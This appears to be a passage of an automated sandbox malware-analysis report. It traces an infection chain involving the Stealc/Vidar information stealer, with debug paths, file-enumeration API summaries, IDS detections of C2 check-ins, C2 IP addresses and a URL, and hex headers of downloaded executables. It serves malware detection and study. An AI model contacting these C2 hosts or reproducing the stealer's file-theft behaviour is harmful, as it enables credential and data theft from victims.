                          Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913830974.000002721BAF0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920246621.000002727C780000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1867767738.000000006C8A7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000014.00000002.2293392231.000000006CCC7000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920787436.000002727C8D0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                          Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: EGIJKEHCAK.exe, 00000013.00000000.2121163542.000000000071C000.00000002.00000001.01000000.00000014.sdmp, EGIJKEHCAK.exe, 00000013.00000002.2868926481.000000000071C000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\gegedirijeduho_lozome.pdb source: wxfSIz4PAi.exe, 00000000.00000003.1663398442.0000000005D81000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000000.1661539238.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                          Source: Binary string: nss3.pdb source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\Local\Temp\u5ek.2Jump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
                          Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
                          Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
                          Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
                          Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
                          Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733
                          Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                          Source: global trafficTCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 91.215.85.66:15647
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 21:08:55 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 21:00:01 GMTETag: "4c400-617062ff083e7"Accept-Ranges: bytesContent-Length: 312320Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 26 85 3e 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 82 c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 c3 03 00 04 00 00 5d 0c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 94 01 00 28 00 00 00 00 40 c2 03 e8 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c3 03 4c 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 89 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a3 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 6d 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 92 c0 03 00 a0 01 00 00 b8 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 69 01 00 00 40 c2 03 00 6a 01 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 4c 14 00 00 00 b0 c3 03 00 16 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:01 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 